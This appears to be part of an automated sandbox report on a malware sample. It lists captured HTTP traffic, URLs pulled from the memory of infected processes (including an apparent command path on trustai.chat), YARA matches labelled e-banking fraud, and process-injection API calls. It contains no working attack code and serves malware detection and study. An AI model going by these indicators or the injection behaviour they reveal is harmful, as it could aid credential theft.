                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 11 Mar 2025 00:32:11 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Fri, 16 Sep 2022 05:35:38 GMT | ETag: W/"49d-5e8c4bb618b87" | Content-Encoding: gzip
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 11 Mar 2025 00:32:13 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Fri, 16 Sep 2022 05:35:38 GMT | ETag: W/"49d-5e8c4bb618b87" | Content-Encoding: gzip
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 11 Mar 2025 00:32:16 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Fri, 16 Sep 2022 05:35:38 GMT | ETag: W/"49d-5e8c4bb618b87" | Content-Encoding: gzip
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 11 Mar 2025 00:32:18 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 1181 | Connection: close | Vary: Accept-Encoding | Last-Modified: Fri, 16 Sep 2022 05:35:38 GMT | ETag: "49d-5e8c4bb618b87" | Accept-Ranges: bytes
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 11 Mar 2025 00:32:24 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nCSYn%2FzaHXYstB0TCBR8AutBnXelbtowJc5H1ypwsd7mrAJQbb9DMJbmJtqdc6TfVfNT1vkIdJrM7BJ0jEVwjLDQP3nwnXFkAiOhul%2Ffzy%2Bv7q6KW9OWrne5FQ7tzxps6q%2Fwp8B4QCJ9"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 91e6f4584c5442c0-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1737&min_rtt=1737&rtt_var=868&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 11 Mar 2025 00:32:27 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M0J9nIfK%2BEUW9ij%2Fb3LyDlv0QInZJlZ%2F1%2BE0KKejAQ2M5wZ6ITVa3924MCoV8%2F72i8i3s98gnk45RxYhYn1otcr94tNv9h58Zg%2Fa4ymZDBl622v3vX%2BtjnNPlJsHXmIDiWKltRZUfCV3"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 91e6f4682e504363-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=835&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 11 Mar 2025 00:32:29 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rr6ku%2BGAqOxzsMod9bhgTZ01ETsdtrgOApEXzRdtocehGI7AEdDdbePIaNoGEhN8v%2BiPlEG1qRDiicfIBWzyi%2BavQqmjZ7htUB%2BFyS5NA0s%2BTQ11s8hnIByfXUXnC7T9WsqoQVUXwuce"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 91e6f4785b00c32e-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1663&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=995&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:32:32 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Si9dzyANvoZlG2SOPO0S%2BUjJHffs%2BZTlvkRRelF86X3uWil2fTefzXqfvocuZF1k14vmOkF%2BI61Rz08mmdrYmFKpoBQzb7nqoAGk%2FUtFoIEbudydv9yuau10DixnNznB%2BNr2U4D8n%2F4n"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e6f4882b0b1a48-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1936&min_rtt=1936&rtt_var=968&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=535&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 30 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 65 77 61 6e 74 68 6f 70 65 72 73 6f 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.newanthoperso.shop Port 80</address></body></html>0
                Source: rekeywiz.exe, 00000007.00000002.3337814954.0000000005194000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000002E34000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1613513360.000000002C7B4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: rekeywiz.exe, 00000007.00000002.3337814954.0000000004DAC000.00000004.10000000.00040000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336035645.0000000004435000.00000004.00000020.00020000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000000.1389196062.0000000002A4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1613513360.000000002C3CC000.00000004.80000000.00040000.00000000.sdmp, hh01FRs81x.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: rekeywiz.exe, 00000007.00000002.3337814954.0000000004DAC000.00000004.10000000.00040000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336035645.0000000004435000.00000004.00000020.00020000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000000.1389196062.0000000002A4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1613513360.000000002C3CC000.00000004.80000000.00040000.00000000.sdmp, hh01FRs81x.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: rekeywiz.exe, 00000007.00000002.3337814954.0000000004DAC000.00000004.10000000.00040000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336035645.0000000004435000.00000004.00000020.00020000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000000.1389196062.0000000002A4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1613513360.000000002C3CC000.00000004.80000000.00040000.00000000.sdmp, hh01FRs81x.exeString found in binary or memory: http://ocsp.comodoca.com0
                Source: Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3338322375.0000000004EF5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.trustai.chat
                Source: Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3338322375.0000000004EF5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.trustai.chat/kv4n/
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://companies.rbc.ru/
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
                Source: rekeywiz.exe, 00000007.00000002.3334449717.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: rekeywiz.exe, 00000007.00000002.3334449717.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: rekeywiz.exe, 00000007.00000003.1503024681.0000000007A62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: rekeywiz.exe, 00000007.00000002.3334449717.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: rekeywiz.exe, 00000007.00000002.3334449717.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: rekeywiz.exe, 00000007.00000002.3334449717.0000000000804000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: rekeywiz.exe, 00000007.00000002.3334449717.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: rekeywiz.exe, 00000007.00000002.3334449717.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.maplez.online&rand=
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
                Source: rekeywiz.exe, 00000007.00000002.3337814954.0000000004DAC000.00000004.10000000.00040000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336035645.0000000004435000.00000004.00000020.00020000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000000.1389196062.0000000002A4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1613513360.000000002C3CC000.00000004.80000000.00040000.00000000.sdmp, hh01FRs81x.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20Y&
                Source: rekeywiz.exe, 00000007.00000002.3337814954.0000000006148000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003DE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: rekeywiz.exe, 00000007.00000002.3340337081.0000000007A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.rbc.ru/technology_and_media/
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.maplez.online&utm_medium=parking&utm_campaign=s_land_se
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.maplez.online&utm_medium=parking&utm_campaign=s_land_n
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.maplez.online&utm_medium=parking&utm_campaign=s_land_host
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
                Source: rekeywiz.exe, 00000007.00000002.3337814954.00000000054B8000.00000004.10000000.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.0000000003158000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.maplez.online&amp;reg_source=parking_auto
                Source: Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3336181471.000000000429E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de

                E-Banking Fraud

                Source: Yara matchFile source: 4.2.hh01FRs81x.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.hh01FRs81x.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1315969342.00000000015E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1315269021.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3336185788.0000000004540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3338322375.0000000004E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3336234747.0000000004590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3334175533.00000000006D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1317262087.0000000002480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3336041844.0000000003320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0042CB43 NtClose,4_2_0042CB43
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2B60 NtClose,LdrInitializeThunk,4_2_016A2B60
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_016A2DF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_016A2C70
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A35C0 NtCreateMutant,LdrInitializeThunk,4_2_016A35C0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A4340 NtSetContextThread,4_2_016A4340
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A4650 NtSuspendThread,4_2_016A4650
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2BE0 NtQueryValueKey,4_2_016A2BE0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2BF0 NtAllocateVirtualMemory,4_2_016A2BF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2BA0 NtEnumerateValueKey,4_2_016A2BA0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2B80 NtQueryInformationFile,4_2_016A2B80
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2AF0 NtWriteFile,4_2_016A2AF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2AD0 NtReadFile,4_2_016A2AD0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2AB0 NtWaitForSingleObject,4_2_016A2AB0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2D30 NtUnmapViewOfSection,4_2_016A2D30
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2D00 NtSetInformationFile,4_2_016A2D00
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2D10 NtMapViewOfSection,4_2_016A2D10
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2DD0 NtDelayExecution,4_2_016A2DD0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2DB0 NtEnumerateKey,4_2_016A2DB0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2C60 NtCreateKey,4_2_016A2C60
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2C00 NtQueryInformationProcess,4_2_016A2C00
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2CF0 NtOpenProcess,4_2_016A2CF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2CC0 NtQueryVirtualMemory,4_2_016A2CC0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2CA0 NtQueryInformationToken,4_2_016A2CA0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2F60 NtCreateProcessEx,4_2_016A2F60
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2F30 NtCreateSection,4_2_016A2F30
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2FE0 NtCreateFile,4_2_016A2FE0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2FA0 NtQuerySection,4_2_016A2FA0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2FB0 NtResumeThread,4_2_016A2FB0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2F90 NtProtectVirtualMemory,4_2_016A2F90
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2E30 NtWriteVirtualMemory,4_2_016A2E30
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2EE0 NtQueueApcThread,4_2_016A2EE0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2EA0 NtAdjustPrivilegesToken,4_2_016A2EA0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2E80 NtReadVirtualMemory,4_2_016A2E80
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A3010 NtOpenDirectoryObject,4_2_016A3010
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A3090 NtSetValueKey,4_2_016A3090
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A39B0 NtGetContextThread,4_2_016A39B0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A3D70 NtOpenThread,4_2_016A3D70
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A3D10 NtOpenProcessToken,4_2_016A3D10
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04704650 NtSuspendThread,LdrInitializeThunk,7_2_04704650
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04704340 NtSetContextThread,LdrInitializeThunk,7_2_04704340
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_04702C70
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702C60 NtCreateKey,LdrInitializeThunk,7_2_04702C60
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_04702CA0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_04702D30
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702D10 NtMapViewOfSection,LdrInitializeThunk,7_2_04702D10
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_04702DF0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702DD0 NtDelayExecution,LdrInitializeThunk,7_2_04702DD0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702EE0 NtQueueApcThread,LdrInitializeThunk,7_2_04702EE0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_04702E80
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702F30 NtCreateSection,LdrInitializeThunk,7_2_04702F30
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702FE0 NtCreateFile,LdrInitializeThunk,7_2_04702FE0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702FB0 NtResumeThread,LdrInitializeThunk,7_2_04702FB0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702AF0 NtWriteFile,LdrInitializeThunk,7_2_04702AF0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702AD0 NtReadFile,LdrInitializeThunk,7_2_04702AD0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702B60 NtClose,LdrInitializeThunk,7_2_04702B60
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04702BF0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702BE0 NtQueryValueKey,LdrInitializeThunk,7_2_04702BE0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_04702BA0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047035C0 NtCreateMutant,LdrInitializeThunk,7_2_047035C0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047039B0 NtGetContextThread,LdrInitializeThunk,7_2_047039B0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702C00 NtQueryInformationProcess,7_2_04702C00
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702CF0 NtOpenProcess,7_2_04702CF0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702CC0 NtQueryVirtualMemory,7_2_04702CC0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702D00 NtSetInformationFile,7_2_04702D00
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702DB0 NtEnumerateKey,7_2_04702DB0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702E30 NtWriteVirtualMemory,7_2_04702E30
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702EA0 NtAdjustPrivilegesToken,7_2_04702EA0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702F60 NtCreateProcessEx,7_2_04702F60
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702FA0 NtQuerySection,7_2_04702FA0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702F90 NtProtectVirtualMemory,7_2_04702F90
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702AB0 NtWaitForSingleObject,7_2_04702AB0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702B80 NtQueryInformationFile,7_2_04702B80
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04703010 NtOpenDirectoryObject,7_2_04703010
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04703090 NtSetValueKey,7_2_04703090
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04703D70 NtOpenThread,7_2_04703D70
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04703D10 NtOpenProcessToken,7_2_04703D10
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006F9370 NtCreateFile,7_2_006F9370
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006F94E0 NtReadFile,7_2_006F94E0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006F95D0 NtDeleteFile,7_2_006F95D0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006F9670 NtClose,7_2_006F9670
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006F97C0 NtAllocateVirtualMemory,7_2_006F97C0
